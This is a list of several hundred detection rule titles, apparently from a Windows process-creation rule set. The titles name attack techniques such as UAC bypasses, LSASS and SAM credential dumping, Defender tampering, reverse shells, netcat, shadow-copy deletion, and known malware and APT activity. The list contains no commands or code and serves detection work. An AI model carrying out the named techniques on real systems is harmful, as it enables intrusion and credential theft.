  • Potential PowerShell Command Line Obfuscation
  • Computer Discovery And Export Via Get-ADComputer Cmdlet
  • New Service Creation Using PowerShell
  • Gzip Archive Decode Via PowerShell
  • PowerShell Execution With Potential Decryption Capabilities
  • Powershell Defender Disable Scan Feature
  • Powershell Defender Exclusion
  • Disable Windows Defender AV Security Monitoring
  • Windows Firewall Disabled via PowerShell
  • Potential PowerShell Downgrade Attack
  • Disabled IE Security Features
  • Potential COM Objects Download Cradles Usage - Process Creation
  • PowerShell Web Download
  • Obfuscated PowerShell OneLiner Execution
  • Potential DLL File Download Via PowerShell Invoke-WebRequest
  • PowerShell Download and Execution Cradles
  • PowerShell Download Pattern
  • Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
  • DSInternals Suspicious PowerShell Cmdlets
  • Email Exfiltration Via Powershell
  • Potential Suspicious Windows Feature Enabled - ProcCreation
  • Suspicious Execution of Powershell with Base64
  • Potential Encoded PowerShell Patterns In CommandLine
  • Powershell Inline Execution From A File
  • Certificate Exported Via PowerShell
  • Base64 Encoded PowerShell Command Detected
  • Suspicious FromBase64String Usage On Gzip Archive - Process Creation
  • PowerShell Get-Process LSASS
  • Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
  • PowerShell Get-Clipboard Cmdlet Via CLI
  • Abuse of Service Permissions to Hide Services Via Set-Service
  • Suspicious PowerShell IEX Execution Patterns
  • Root Certificate Installed From Susp Locations
  • Import PowerShell Modules From Suspicious Directories - ProcCreation
  • Unsigned AppX Installation Attempt Using Add-AppxPackage
  • Suspicious PowerShell Invocations - Specific - ProcessCreation
  • Suspicious Invoke-WebRequest Execution With DirectIP
  • Suspicious Invoke-WebRequest Execution
  • Suspicious PowerShell Mailbox Export to Share
  • Malicious PowerShell Commandlets - ProcessCreation
  • MSExchange Transport Agent Installation
  • Non Interactive PowerShell Process Spawned
  • Potential PowerShell Obfuscation Via WCHAR
  • Execution of Powershell Script in Public Folder
  • Tamper Windows Defender Remove-MpPreference
  • RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
  • Potential Powershell ReverseShell Connection
  • Run PowerShell Script from ADS
  • Run PowerShell Script from Redirected Input Stream
  • PowerShell SAM Copy
  • Suspicious Service DACL Modification Via Set-Service Cmdlet
  • Suspicious PowerShell Invocation From Script Engines
  • PowerShell Set-Acl On Windows Folder
  • Change PowerShell Policies to an Insecure Level
  • PowerShell Script Change Permission Via Set-Acl
  • Service StartupType Change Via PowerShell Set-Service
  • Deletion of Volume Shadow Copies via WMI with PowerShell
  • Exchange PowerShell Snap-Ins Usage
  • Stop Windows Service Via PowerShell Stop-Service
  • Suspicious PowerShell Download and Execute Pattern
  • Suspicious PowerShell Parameter Substring
  • Suspicious PowerShell Parent Process
  • PowerShell Script Run in AppData
  • Powershell Token Obfuscation - Process Creation
  • PowerShell DownloadFile
  • User Discovery And Export Via Get-ADUser Cmdlet
  • Net WebClient Casing Anomalies
  • Suspicious X509Enrollment - Process Creation
  • Suspicious XOR Encoded PowerShell Command
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
  • Arbitrary File Download Via PresentationHost.EXE
  • XBAP Execution From Uncommon Locations Via PresentationHost.EXE
  • Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
  • Abusing Print Executable
  • File Download Using ProtocolHandler.exe
  • Suspicious Provlaunch.EXE Child Process
  • Potential Provlaunch.EXE Binary Proxy Execution Abuse
  • Screen Capture Activity Via Psr.EXE
  • PUA - 3Proxy Execution
  • PUA - AdFind Suspicious Execution
  • PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
  • PUA - AdvancedRun Execution
  • PUA - AdvancedRun Suspicious Execution
  • PUA - Advanced IP Scanner Execution
  • PUA - Advanced Port Scanner Execution
  • PUA - Chisel Tunneling Tool Execution
  • PUA - CleanWipe Execution
  • PUA - Crassus Execution
  • PUA - CsExec Execution
  • PUA - DIT Snapshot Viewer
  • PUA - DefenderCheck Execution
  • PUA - Fast Reverse Proxy (FRP) Execution
  • PUA - IOX Tunneling Tool Execution
  • PUA - Mouse Lock Execution
  • PUA - Netcat Suspicious Execution
  • PUA - SoftPerfect Netscan Execution
  • PUA - Ngrok Execution
  • PUA - Nimgrab Execution
  • PUA - NirCmd Execution
  • PUA - NirCmd Execution As LOCAL SYSTEM
  • PUA - Nmap/Zenmap Execution
  • PUA - NPS Tunneling Tool Execution
  • PUA - NSudo Execution
  • PUA - PingCastle Execution
  • PUA - PingCastle Execution From Potentially Suspicious Parent
  • PUA - Process Hacker Execution
  • PUA - Radmin Viewer Utility Execution
  • PUA - Potential PE Metadata Tamper Using Rcedit
  • PUA - Rclone Execution
  • PUA - RunXCmd Execution
  • PUA - Seatbelt Execution
  • PUA - System Informer Execution
  • PUA - WebBrowserPassView Execution
  • PUA - Wsudo Suspicious Execution
  • PUA - Adidnsdump Execution
  • Python Inline Command Execution
  • Python Spawning Pretty TTY on Windows
  • Potentially Suspicious Usage Of Qemu
  • Query Usage To Exfil Data
  • QuickAssist Execution
  • Rar Usage with Password and Compression Level
  • Files Added To An Archive Using Rar.EXE
  • Suspicious Greedy Compression Using Rar.EXE
  • Suspicious RASdial Activity
  • Process Memory Dump via RdrLeakDiag.EXE
  • Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
  • Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
  • Exports Critical Registry Keys To a File
  • Exports Registry Key To a File
  • Imports Registry Key From a File
  • Imports Registry Key From an ADS
  • Regedit as Trusted Installer
  • Suspicious Registry Modification From ADS Via Regini.EXE
  • Registry Modification Via Regini.EXE
  • DLL Execution Via Register-cimprovider.exe
  • Enumeration for 3rd Party Creds From CLI
  • Suspicious Debugger Registration Cmdline
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
  • Potential Persistence Via Logon Scripts - CommandLine
  • Potential Credential Dumping Attempt Using New NetworkProvider - CLI
  • Python Function Execution Security Warning Disabled In Excel
  • Potential Privilege Escalation via Service Permissions Weakness
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution
  • Potential PowerShell Execution Policy Tampering - ProcCreation
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine
  • Persistence Via TypedPaths - CommandLine
  • Potential Regsvr32 Commandline Flag Anomaly
  • Potentially Suspicious Regsvr32 HTTP IP Pattern
  • Potentially Suspicious Regsvr32 HTTP/FTP Pattern
  • Suspicious Regsvr32 Execution From Remote Share
  • Potentially Suspicious Child Process Of Regsvr32
  • Regsvr32 Execution From Potential Suspicious Location
  • Regsvr32 Execution From Highly Suspicious Location
  • Regsvr32 DLL Execution With Suspicious File Extension
  • Scripting/CommandLine Process Spawned Regsvr32
  • Regsvr32 DLL Execution With Uncommon Extension
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE
  • Add SafeBoot Keys Via Reg Utility
  • Suspicious Reg Add BitLocker
  • Dropping Of Password Filter DLL
  • SafeBoot Registry Key Deleted Via Reg.EXE
  • Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
  • Service Registry Key Deleted Via Reg.EXE
  • Potentially Suspicious Desktop Background Change Using Reg.EXE
  • Direct Autorun Keys Modification
  • Security Service Disabled Via Reg.EXE
  • Dumping of Sensitive Hives Via Reg.EXE
  • Windows Recall Feature Enabled Via Reg.EXE
  • Potential Suspicious Registry File Imported Via Reg.EXE
  • LSA PPL Protection Disabled Via Reg.EXE
  • Modify Group Policy Settings
  • Suspicious Reg Add Open Command
  • Enumeration for Credentials in Registry
  • Enable LM Hash Storage - ProcCreation
  • RestrictedAdminMode Registry Value Tampering - ProcCreation
  • Detected Windows Software Discovery
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE
  • Potential Configuration And Service Reconnaissance Via Reg.EXE
  • Suspicious ScreenSave Change by Reg.exe
  • Changing Existing Service ImagePath Value Via Reg.EXE
  • Reg Add Suspicious Paths
  • Disabled Volume Snapshots
  • Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
  • Write Protect For Storage Disabled
  • Suspicious Query of MachineGUID
  • Remote Access Tool - AnyDesk Execution
  • Remote Access Tool - AnyDesk Piped Password Via CLI
  • Remote Access Tool - AnyDesk Silent Installation
  • Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
  • Remote Access Tool - Anydesk Execution From Suspicious Folder
  • Remote Access Tool - RURAT Execution From Unusual Location
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral
  • Remote Access Tool - NetSupport Execution
  • Remote Access Tool - NetSupport Execution From Unusual Location
  • Remote Access Tool - GoToAssist Execution
  • Remote Access Tool - LogMeIn Execution
  • Remote Access Tool - ScreenConnect Execution
  • Remote Access Tool - ScreenConnect Installation Execution
  • Remote Access Tool - ScreenConnect Remote Command Execution
  • Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
  • Remote Access Tool - ScreenConnect Server Web Shell Execution
  • Remote Access Tool - Simple Help Execution
  • Remote Access Tool - Team Viewer Session Started On Windows Host
  • Remote Access Tool - UltraViewer Execution
  • Discovery of a System Time
  • Renamed AdFind Execution
  • Renamed AutoHotkey.EXE Execution
  • Renamed AutoIt Execution
  • Potential Defense Evasion Via Binary Rename
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries
  • Renamed BOINC Client Execution
  • Renamed BrowserCore.EXE Execution
  • Renamed Cloudflared.EXE Execution
  • Renamed CreateDump Utility Execution
  • Renamed CURL.EXE Execution
  • Renamed ZOHO Dctask64 Execution
  • Renamed FTP.EXE Execution
  • Renamed Gpg.EXE Execution
  • Renamed Jusched.EXE Execution
  • Renamed Mavinject.EXE Execution
  • Renamed MegaSync Execution
  • Renamed Msdt.EXE Execution
  • Renamed Microsoft Teams Execution
  • Renamed NetSupport RAT Execution
  • Renamed NirCmd.EXE Execution
  • Renamed Office Binary Execution
  • Renamed PAExec Execution
  • Renamed PingCastle Binary Execution
  • Renamed Plink Execution
  • Visual Studio NodejsTools PressAnyKey Renamed Execution
  • Potential Renamed Rundll32 Execution
  • Renamed Remote Utilities RAT (RURAT) Execution
  • Renamed SysInternals DebugView Execution
  • Renamed ProcDump Execution
  • Renamed PsExec Service Execution
  • Renamed Sysinternals Sdelete Execution
  • Renamed Vmnat.exe Execution
  • Renamed Whoami Execution
  • Capture Credentials with Rpcping.exe
  • Ruby Inline Command Execution
  • Potential Rundll32 Execution With DLL Stored In ADS
  • Suspicious Advpack Call Via Rundll32.EXE
  • Suspicious Rundll32 Invoking Inline VBScript
  • Rundll32 InstallScreenSaver Execution
  • Suspicious Key Manager Access
  • Rundll32 Execution Without CommandLine Parameters
  • Mshtml.DLL RunHTMLApplication Suspicious Usage
  • Suspicious NTLM Authentication on the Printer Spooler Service
  • Potential Obfuscated Ordinal Call Via Rundll32
  • Rundll32 Spawned Via Explorer.EXE
  • Process Memory Dump Via Comsvcs.DLL
  • Rundll32 Registered COM Objects
  • Suspicious Process Start Locations
  • Suspicious Rundll32 Setupapi.dll Activity
  • Shell32 DLL Execution in Suspicious Directory
  • Potential ShellDispatch.DLL Functionality Abuse
  • RunDLL32 Spawning Explorer
  • Potentially Suspicious Rundll32 Activity
  • Suspicious Control Panel DLL Load
  • Suspicious Rundll32 Execution With Image Extension
  • Suspicious Usage Of ShellExec_RunDLL
  • Suspicious ShellExec_RunDLL Call Via Ordinal
  • ShimCache Flush
  • Suspicious Rundll32 Activity Invoking Sys File
  • Potentially Suspicious Rundll32.EXE Execution of UDL File
  • Rundll32 Execution With Uncommon DLL Extension
  • Rundll32 UNC Path Execution
  • Suspicious Workstation Locking via Rundll32
  • Suspicious Modification Of Scheduled Tasks
  • Suspicious WebDav Client Execution Via Rundll32.EXE
  • WebDav Client Execution Via Rundll32.EXE
  • Rundll32 Execution Without Parameters
  • Run Once Task Execution as Configured in Registry
  • Suspicious Schtasks Execution AppData Folder
  • Scheduled Task Creation Via Schtasks.EXE
  • Suspicious Scheduled Task Creation Involving Temp Folder
  • Delete Important Scheduled Task
  • Delete All Scheduled Tasks
  • Disable Important Scheduled Task
  • Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
  • Schtasks From Suspicious Folders
  • Suspicious Scheduled Task Name As GUID
  • Uncommon One Time Only Scheduled Task At 00:00
  • Potential Persistence Via Microsoft Compatibility Appraiser
  • Potential Persistence Via Powershell Search Order Hijacking - Task
  • Scheduled Task Executing Payload from Registry
  • Scheduled Task Executing Encoded Payload from Registry
  • Suspicious Schtasks Schedule Types
  • Suspicious Schtasks Schedule Type With High Privileges
  • Suspicious Scheduled Task Creation via Masqueraded XML File
  • Suspicious Command Patterns In Scheduled Task Creation
  • Schtasks Creation Or Modification With SYSTEM Privileges
  • Script Event Consumer Spawning Process
  • Possible Privilege Escalation via Weak Service Permissions
  • New Service Creation Using Sc.EXE
  • Service StartupType Change Via Sc.EXE
  • New Kernel Driver Via SC.EXE
  • Interesting Service Enumeration Via Sc.EXE
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Service DACL Abuse To Hide Services Via Sc.EXE
  • Service Security Descriptor Tampering Via Sc.EXE
  • Suspicious Service Path Modification
  • Potential Persistence Attempt Via Existing Service Tampering
  • Stop Windows Service Via Sc.EXE
  • Potential Shim Database Persistence via Sdbinst.EXE
  • Uncommon Extension Shim Database Installation Via Sdbinst.EXE
  • Sdclt Child Processes
  • Sdiagnhost Calling Suspicious Child Process
  • Potential Suspicious Activity Using SeCEdit
  • Suspicious Serv-U Process Pattern
  • Uncommon Child Process Of Setres.EXE
  • Potential SPN Enumeration Via Setspn.EXE
  • Setup16.EXE Execution With Custom .Lst File
  • Suspicious Execution of Shutdown
  • Suspicious Execution of Shutdown to Log Out
  • Uncommon Sigverif.EXE Child Process
  • Uncommon Child Processes Of SndVol.exe
  • Audio Capture via SoundRecorder
  • Suspicious Splwow64 Without Params
  • Suspicious Spool Service Child Process
  • Veeam Backup Database Suspicious Query
  • VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
  • SQLite Chromium Profile Data DB Access
  • SQLite Firefox Profile Data DB Access
  • Arbitrary File Download Via Squirrel.EXE
  • Process Proxy Execution Via Squirrel.EXE
  • Port Forwarding Activity Via SSH.EXE
  • Program Executed Using Proxy/Local Command Via SSH.EXE
  • Potential RDP Tunneling Via SSH
  • Potential Amazon SSM Agent Hijacking
  • Execution via stordiag.exe
  • Start of NT Virtual DOS Machine
  • Abused Debug Privilege by Arbitrary Parent Processes
  • User Added to Local Administrators Group
  • User Added To Highly Privileged Group
  • User Added to Remote Desktop Users Group
  • Execute From Alternate Data Streams
  • Always Install Elevated Windows Installer
  • Potentially Suspicious Windows App Activity
  • Arbitrary Shell Command Execution Via Settingcontent-Ms
  • Phishing Pattern ISO in Archive
  • Automated Collection Command Prompt
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments
  • Potential Suspicious Browser Launch From Document Reader Process
  • Potential Browser Data Stealing
  • Suspicious Child Process Created as System
  • Potential Commandline Obfuscation Using Escape Characters
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
  • Potential Command Line Path Traversal Evasion Attempt
  • Suspicious Copy From or To System Directory
  • Copy From Or To Admin Share Or Sysvol Folder
  • Potential Crypto Mining Activity
  • LOL-Binary Copied From System Directory
  • Potential Data Exfiltration Activity Via CommandLine Tools
  • Raccine Uninstall
  • Suspicious Double Extension File Execution
  • Suspicious Parent Double Extension File Execution
  • Suspicious Download from Office Domain
  • DumpStack.log Defender Evasion
  • Always Install Elevated MSI Spawned Cmd And Powershell
  • Suspicious Electron Application Child Processes
  • Potentially Suspicious Electron Application CommandLine
  • Elevated System Shell Spawned From Uncommon Parent Location
  • Hidden Powershell in Link File Pattern
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
  • ETW Logging Tamper In .NET Processes Via CommandLine
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
  • ETW Trace Evasion Activity
  • Suspicious Eventlog Clearing or Configuration Change Activity
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
  • Potentially Suspicious Execution From Parent Process In Public Folder
  • Process Execution From A Potentially Suspicious Folder
  • Suspicious File Characteristics Due to Missing Fields
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
  • Writing Of Malicious Files To The Fonts Folder
  • Potential Homoglyph Attack Using Lookalike Characters
  • Execution Of Non-Existing File
  • Base64 MZ Header In CommandLine
  • Potential WinAPI Calls Via CommandLine
  • Potentially Suspicious JWT Token Search Via CLI
  • Local Accounts Discovery
  • LOLBIN Execution From Abnormal Drive
  • LSASS Dump Keyword In CommandLine
  • Potential File Download Via MS-AppInstaller Protocol Handler
  • Suspicious Network Command
  • Suspicious Scan Loop Network
  • Potential Network Sniffing Activity Using Network Tools
  • Execution of Suspicious File Type Extension
  • Non-privileged Usage of Reg or Powershell
  • Process Launched Without Image Name
  • Suspicious Process Patterns NTDS.DIT Exfil
  • Potentially Suspicious Call To Win32_NTEventlogFile Class
  • Use Short Name Path in Command Line
  • Use Short Name Path in Image
  • Use NTFS Short Name in Command Line
  • Use NTFS Short Name in Image
  • Obfuscated IP Download Activity
  • Obfuscated IP Via CLI
  • Suspicious Process Parents
  • Private Keys Reconnaissance Via CommandLine Tools
  • Potential PowerShell Execution Via DLL
  • Suspicious RunAs-Like Flag Combination
  • Privilege Escalation via Named Pipe Impersonation
  • Windows Processes Suspicious Parent Directory
  • Suspicious Program Names
  • Recon Information for Export with Command Prompt
  • Suspicious Process Execution From Fake Recycle.Bin Folder
  • Suspicious Redirection to Local Admin Share
  • Potential Remote Desktop Tunneling
  • Potential Defense Evasion Via Right-to-Left Override
  • Script Interpreter Execution From Suspicious Folder
  • Suspicious Script Execution From Temp Folder
  • Sensitive File Access Via Volume Shadow Copy Backup
  • Suspicious New Service Creation
  • Suspicious Service Binary Directory
  • Shadow Copies Creation Using Operating Systems Utilities
  • Suspicious Windows Service Tampering
  • System File Execution Location Anomaly
  • Shadow Copies Deletion Using Operating Systems Utilities
  • Windows Shell/Scripting Processes Spawning Suspicious Programs
  • Suspicious SYSTEM User Process Creation
  • Suspicious SYSVOL Domain Group Policy Access
  • Tasks Folder Evasion
  • Process Creation Using Sysnative Folder
  • Suspicious Userinit Child Process
  • Malicious Windows Script Components File Execution by TAEF Detection
  • Malicious PE Execution by Microsoft Visual Studio Debugger
  • Weak or Abused Passwords In CLI
  • Usage Of Web Request Commands And Cmdlets
  • WhoAmI as Parameter
  • Execution via WorkFolders.exe
  • Suspect Svchost Activity
  • Suspicious Process Masquerading As SvcHost.EXE
  • Terminal Service Process Spawn
  • Uncommon Svchost Parent Process
  • Permission Check Via Accesschk.EXE
  • Active Directory Database Snapshot Via ADExplorer
  • Suspicious Active Directory Database Snapshot Via ADExplorer
  • Potential Execution of Sysinternals Tools
  • Potential Memory Dumping Activity Via LiveKD
  • Kernel Memory Dump Via LiveKD
  • Procdump Execution
  • Potential SysInternals ProcDump Evasion
  • Potential LSASS Process Dump Via Procdump
  • Psexec Execution
  • PsExec/PAExec Escalation to LOCAL SYSTEM
  • Potential PsExec Remote Execution
  • PsExec Service Child Process Execution as LOCAL SYSTEM
  • PsExec Service Execution
  • Suspicious Use of PsLogList
  • Sysinternals PsService Execution
  • Sysinternals PsSuspend Execution
  • Sysinternals PsSuspend Suspicious Execution
  • Potential File Overwrite Via Sysinternals SDelete
  • Potential Privilege Escalation To LOCAL SYSTEM
  • Sysmon Configuration Update
  • Uninstall Sysinternals Sysmon
  • Potential Binary Impersonating Sysinternals Tools
  • Sysprep on AppData Folder
  • Suspicious Execution of Systeminfo
  • Potential Signing Bypass Via Windows Developer Features
  • Suspicious Recursive Takeown
  • Tap Installer Execution
  • Compressed File Creation Via Tar.EXE
  • Compressed File Extraction Via Tar.EXE
  • Taskkill Symantec Endpoint Protection
  • Loaded Module Enumeration Via Tasklist.EXE
  • Taskmgr as LOCAL_SYSTEM
  • New Process Created Via Taskmgr.EXE
  • Potentially Suspicious Command Targeting Teams Sensitive Files
  • Suspicious TSCON Start as SYSTEM
  • New Virtual Smart Card Created Via TpmVscMgr.EXE
  • Bypass UAC via CMSTP
  • Suspicious RDP Redirect Using TSCON
  • UAC Bypass Using Disk Cleanup
  • UAC Bypass Using ChangePK and SLUI
  • CMSTP UAC Bypass via COM Object Access
  • UAC Bypass Tools Using ComputerDefaults
  • Potential RDP Session Hijacking Activity
  • UAC Bypass Using Consent and Comctl32 - Process
  • UAC Bypass Using DismHost
  • Bypass UAC via Fodhelper.exe
  • UAC Bypass Using Event Viewer RecentViews
  • UAC Bypass Using NTFS Reparse Point - Process
  • UAC Bypass via ICMLuaUtil
  • UAC Bypass Using IDiagnostic Profile
  • UAC Bypass Using IEInstal - Process
  • UAC Bypass via Windows Firewall Snap-In Hijack
  • UAC Bypass Using MSConfig Token Modification - Process
  • UAC Bypass Using PkgMgr and DISM
  • Potential UAC Bypass Via Sdclt.EXE
  • TrustedPath UAC Bypass Pattern
  • UAC Bypass Abusing Winsat Path Parsing - Process
  • UAC Bypass Using Windows Media Player - Process
  • Bypass UAC via WSReset.exe
  • UAC Bypass WSReset
  • Use of UltraVNC Remote Access Software
  • Suspicious UltraVNC Execution
  • Uninstall Crowdstrike Falcon Sensor
  • Windows Credential Manager Access via VaultCmd
  • Uncommon Userinit Child Process
  • Verclsid.exe Runs COM Object
  • Detect Virtualbox Driver Installation OR Starting Of VMs
  • Suspicious VBoxDrvInst.exe Parameters
  • Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • VMToolsd Suspicious Child Process
  • Potentially Suspicious Child Process Of VsCode
  • Visual Studio Code Tunnel Execution
  • Visual Studio Code Tunnel Shell Execution
  • Renamed Visual Studio Code Tunnel Execution
  • Visual Studio Code Tunnel Service Installation
  • Potential Binary Proxy Execution Via VSDiagnostics.EXE
  • Suspicious Vsls-Agent Command With AgentExtensionPath Load
  • Use of W32tm as Timer
  • Wab Execution From Non Default Location
  • Wab/Wabmig Unusual Parent Or Child Processes
  • All Backups Deleted Via Wbadmin.EXE
  • Windows Backup Deleted Via Wbadmin.EXE
  • Sensitive File Dump Via Wbadmin.EXE
  • File Recovery From Backup Via Wbadmin.EXE
  • Sensitive File Recovery From Backup Via Wbadmin.EXE
  • Potentially Suspicious WebDAV LNK Execution
  • Chopper Webshell Process Pattern
  • Webshell Hacking Activity Patterns
  • Webshell Detection With Command Line Keywords
  • Suspicious Process By Web Server Process
  • Potential Credential Dumping Via WER
  • Webshell Tool Reconnaissance Activity
  • Potential ReflectDebugger Content Execution Via WerFault.EXE
  • Suspicious Child Process Of Wermgr.EXE
  • Suspicious Execution Location Of Wermgr.EXE
  • Suspicious File Download From IP Via Wget.EXE
  • Suspicious File Download From File Sharing Domain Via Wget.EXE
  • Suspicious File Download From IP Via Wget.EXE - Paths
  • Suspicious Where Execution
  • Enumerate All Information With Whoami.EXE
  • Whoami Utility Execution
  • Whoami.EXE Execution From Privileged Process
  • Group Membership Reconnaissance Via Whoami.EXE
  • Whoami.EXE Execution With Output Option
  • Whoami.EXE Execution Anomaly
  • Security Privileges Enumeration Via Whoami.EXE
  • Suspicious WindowsTerminal Child Processes
  • Add New Download Source To Winget
  • Add Insecure Download Source To Winget
  • Add Potential Suspicious New Download Source To Winget
  • Install New Package Via Winget Local Manifest
  • Winrar Compressing Dump Files
  • Potentially Suspicious Child Process Of WinRAR.EXE
  • Winrar Execution in Non-Standard Folder
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
  • Remote Code Execute via Winrm.vbs
  • Remote PowerShell Session Host Process (WinRM)
  • Suspicious Processes Spawned by WinRM
  • Compress Data and Lock With Password for Exfiltration With WINZIP
  • Wlrmdr.EXE Uncommon Argument Or Child Process
  • New ActiveScriptEventConsumer Created Via Wmic.EXE
  • Potential Windows Defender Tampering Via Wmic.EXE
  • New Process Created Via Wmic.EXE
  • Computer System Reconnaissance Via Wmic.EXE
  • Local Groups Reconnaissance Via Wmic.EXE
  • Hardware Model Reconnaissance Via Wmic.EXE
  • Windows Hotfix Updates Reconnaissance Via Wmic.EXE
  • Process Reconnaissance Via Wmic.EXE
  • Potential Product Reconnaissance Via Wmic.EXE
  • Potential Product Class Reconnaissance Via Wmic.EXE
  • Service Reconnaissance Via Wmic.EXE
  • Uncommon System Information Discovery Via Wmic.EXE
  • Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
  • System Disk And Volume Reconnaissance Via Wmic.EXE
  • WMIC Remote Command Execution
  • Service Started/Stopped Via Wmic.EXE
  • Potential SquiblyTwo Technique Execution
  • Suspicious WMIC Execution Via Office Process
  • Suspicious Process Created Via Wmic.EXE
  • Application Terminated Via Wmic.EXE
  • Application Removed Via Wmic.EXE
  • Potential Tampering With Security Products Via WMIC
  • XSL Script Execution Via WMIC.EXE
  • WmiPrvSE Spawned A Process
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
  • Suspicious WmiPrvSE Child Process
  • WMI Backdoor Exchange Transport Agent
  • WMI Persistence - Script Event Consumer
  • UEFI Persistence Via Wpbbin - ProcessCreation
  • Potential Dropper Script Execution Via WScript/CScript
  • Cscript/Wscript Potentially Suspicious Child Process
  • Cscript/Wscript Uncommon Script Extension Execution
  • WSL Child Process Anomaly
  • Windows Binary Executed From WSL
  • Proxy Execution Via Wuauclt.EXE
  • Suspicious Windows Update Agent Empty Cmdline
  • Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
  • Wusa.EXE Executed By Parent Process Located In Suspicious Location
  • Xwizard.EXE Execution From Non-Default Location
  • COM Object Execution via Xwizard.EXE
  • ZxShell Malware
  • Turla Group Lateral Movement
  • Turla Group Commands May 2020
  • Exploit for CVE-2015-1641
  • Exploit for CVE-2017-0261
  • Droppers Exploiting CVE-2017-11882
  • Exploit for CVE-2017-8759
  • Adwind RAT / JRAT
  • Fireball Archer Install
  • NotPetya Ransomware Activity
  • Potential PlugX Activity
  • WannaCry Ransomware Activity
  • Potential APT10 Cloud Hopper Activity
  • Ps.exe Renamed SysInternals Tool
  • Lazarus System Binary Masquerading
  • Elise Backdoor Activity
  • APT27 - Emissary Panda Activity
  • Sofacy Trojan Loader Activity
  • APT29 2018 Phishing Campaign CommandLine Indicators
  • Potential MuddyWater APT Activity
  • OilRig APT Activity
  • Defrag Deactivation
  • TropicTrooper Campaign November 2018
  • Potential BearLPE Exploitation
  • Exploiting SetupComplete.cmd CVE-2019-1378
  • Exploiting CVE-2019-1388
  • Potential Baby Shark Malware Activity
  • Potential Dridex Activity
  • Potential Dtrack RAT Activity
  • Potential Emotet Activity
  • Formbook Process Creation
  • LockerGoga Ransomware Activity
  • Potential QBot Activity
  • Potential Ryuk Ransomware Activity
  • Potential Snatch Ransomware Activity
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
  • APT31 Judgement Panda Activity
  • Potential Russian APT Credential Theft Activity
  • Potential EmpireMonkey Activity
  • Equation Group DLL_U Export Function Load
  • Mustang Panda Dropper
  • Operation Wocao Activity
  • DNS RCE CVE-2020-1350
  • Potential Emotet Rundll32 Execution
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
  • Suspicious PrinterPorts Creation (CVE-2020-1048)
  • Exploited CVE-2020-10189 Zoho ManageEngine
  • Blue Mockingbird
  • GALLIUM IOCs
  • Potential Maze Ransomware Activity
  • Trickbot Malware Activity
  • Potential Ke3chang/TidePool Malware Activity
  • EvilNum APT Golden Chickens Deployment Via OCX Files
  • Lazarus Group Activity
  • UNC2452 Process Creation Patterns
  • Greenbug Espionage Group Indicators
  • UNC2452 PowerShell Pattern
  • Suspicious VBScript UN2452 Pattern
  • TAIDOOR RAT DLL Load
  • Winnti Malware HK University Campaign
  • Winnti Pipemon Characteristics
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
  • Potential CVE-2021-26857 Exploitation Attempt
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322
  • Potential CVE-2021-40444 Exploitation Attempt
  • Potential Exploitation Attempt From Office Application
  • Potential CVE-2021-41379 Exploitation Attempt
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
  • Suspicious RazerInstaller Explorer Subprocess
  • Potential SystemNightmare Exploitation Attempt
  • Potential BlackByte Ransomware Activity
  • Conti Volume Shadow Listing
  • Conti NTDS Exfiltration Command
  • Potential Conti Ransomware Activity
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd
  • DarkSide Ransomware Pattern
  • Potential Devil Bait Malware Reconnaissance
  • Potential Goofy Guineapig Backdoor Activity
  • Potential Goofy Guineapig GoolgeUpdate Process Anomaly
  • Pingback Backdoor Activity
  • Small Sieve Malware CommandLine Indicator
  • HAFNIUM Exchange Exploitation Activity
  • REvil Kaseya Incident Malware Patterns
  • SOURGUM Actor Behaviours
  • Potential CVE-2023-21554 QueueJumper Exploitation
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
  • Potential CVE-2022-26809 Exploitation Attempt
  • Potential CVE-2022-29072 Exploitation Attempt
  • Suspicious Sysmon as Execution Parent
  • ChromeLoader Malware Execution
  • Emotet Loader Execution Via .LNK File
  • Hermetic Wiper TG Process Patterns
  • Raspberry Robin Subsequent Execution of Commands
  • Raspberry Robin Initial Execution From External Drive
  • Serpent Backdoor Payload Execution Via Scheduled Task
